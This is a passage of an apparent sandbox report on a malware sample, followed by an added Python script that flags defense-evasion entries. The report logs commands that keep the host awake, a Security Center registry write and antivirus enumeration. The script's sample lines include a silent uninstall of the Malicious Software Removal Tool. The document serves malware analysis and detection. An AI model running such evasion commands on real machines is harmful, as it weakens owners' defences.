          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: dwm.exe, 00000039.00000000.1417995604.0000028F8575A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000039.00000000.1419095064.0000028F85B94000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: bProgram Manager]
          Source: winlogon.exe, 0000002F.00000000.1402626818.000001C8F7DB1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_00000280923942F0 cpuid 131_2_00000280923942F0
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
          Source: C:\Windows\System32\dialer.exe | Code function: 41_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,41_2_0000000140001B54
          Source: C:\Windows\System32\dasHost.exe | Code function: 131_2_0000028092387960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,131_2_0000028092387960
          Source: C:\Windows\System32\dialer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\AppData\Local\Temp\Temp1_MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zip\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: svchost.exe, 0000000E.00000002.2581385774.0000023A06502000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
          Source: svchost.exe, 0000000E.00000002.2581385774.0000023A06502000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000070.00000003.1940878318.00000177815FB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2767734207.00000177811EA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2708670395.000001778094D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2691821114.00000177808D7000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2654194377.000001778081B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000070.00000002.2810112985.00000177815F9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
          Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
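The entries in this section are a small, scriptable set: powercfg zeroing the AC standby and hibernate timeouts so the host never sleeps (a miner wants uninterrupted CPU time, not stealth), wusa silently removing KB890830 (the Malicious Software Removal Tool), a write under HKLM\SOFTWARE\Microsoft\Security Center, and enumeration of AntiVirusProduct in root\SecurityCenter2. Two caveats matter before acting on the image names alone: MpCmdRun.exe is Windows Defender's own command-line tool and its SecurityCenter2 query is expected, and svchost.exe also hosts the Security Center service (wscsvc), which legitimately subscribes to these WMI notifications and maintains that key, so an svchost hit needs to be tied to the hosted service or to the injection evidence earlier on this page. The script below is an added example, not Joe Sandbox code: it recognises those four patterns in report lines of this shape and marks which ones deserve attention. The sample lines and the allowlist of expected enumerators are constructed assumptions; the technique IDs in the notes are the ATT&CK sub-techniques these map to.

```python
r"""Triage the defense-evasion entries of a sandbox report.

Added example, not Joe Sandbox code. Recognises four patterns seen in this
report: powercfg zeroing standby/hibernate timeouts, wusa removing KB890830
(the Malicious Software Removal Tool), writes under the Security Center
registry key, and WMI enumeration of root\SecurityCenter2 products. The sample
lines and the allowlist are constructed assumptions.
"""
import re

# Source group stops at the first ".exe", so the run-together extracted form
# ("...cmd.exeProcess created: ...") parses as well as the separated one.
EVENT_RE = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)\s*\|?\s*"
    r"(?P<kind>Process created|WMI Queries|Key value created or modified):\s*(?P<detail>.+)"
)

POWERCFG_NO_SLEEP = re.compile(r"-(?:standby|hibernate)-timeout-(?:ac|dc)\s+0\b", re.I)
MSRT_UNINSTALL = re.compile(r"wusa(?:\.exe)?\s+/uninstall\s+/kb:890830\b", re.I)
AV_ENUM = re.compile(
    r"SecurityCenter2?\b.*?\b(?:AntiVirusProduct|AntiSpywareProduct|FirewallProduct)\b", re.I
)
SECURITY_CENTER_KEY = re.compile(r"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Security Center\b", re.I)

# Images expected to enumerate SecurityCenter2 (assumed allowlist for the example).
EXPECTED_AV_ENUMERATORS = {"mpcmdrun.exe", "msmpeng.exe"}

# Constructed sample lines mirroring the report's entries (not copied from it).
SAMPLE_EVENTS = r"""
Source: C:\Users\user\AppData\Local\Temp\Setup.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\svchost.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\powercfg.exe powercfg /list
"""


def image_name(path):
    """Lower-case file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def finding(src, label, suspicious, note):
    return {"source": src, "label": label, "suspicious": suspicious, "note": note}


def classify(src, kind, detail):
    """Map one parsed event to a finding, or None if no rule applies."""
    name = image_name(src)
    if kind == "Process created":
        if "powercfg" in detail.lower() and POWERCFG_NO_SLEEP.search(detail):
            return finding(src, "powercfg_no_sleep", True,
                           "standby/hibernate timeout set to 0: host kept awake")
        if MSRT_UNINSTALL.search(detail):
            return finding(src, "msrt_uninstall", True,
                           "KB890830 is the Malicious Software Removal Tool (T1562.001)")
    elif kind == "WMI Queries" and AV_ENUM.search(detail):
        if name in EXPECTED_AV_ENUMERATORS:
            return finding(src, "av_enumeration", False,
                           "expected: security product enumerating SecurityCenter2")
        if name == "svchost.exe":
            return finding(src, "av_enumeration", True,
                           "service host: attribute to the hosted service (wscsvc does this legitimately) before acting (T1518.001)")
        return finding(src, "av_enumeration", True, "AV product enumeration (T1518.001)")
    elif kind == "Key value created or modified" and SECURITY_CENTER_KEY.search(detail):
        return finding(src, "security_center_tamper", True,
                       "Security Center configuration written (T1562.001)")
    return None


def triage(text):
    """Parse report lines and return findings in input order."""
    findings = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if not m:
            continue
        f = classify(m.group("src"), m.group("kind"), m.group("detail"))
        if f:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(("!" if f["suspicious"] else " "), f["label"], f["source"], "-", f["note"])
```

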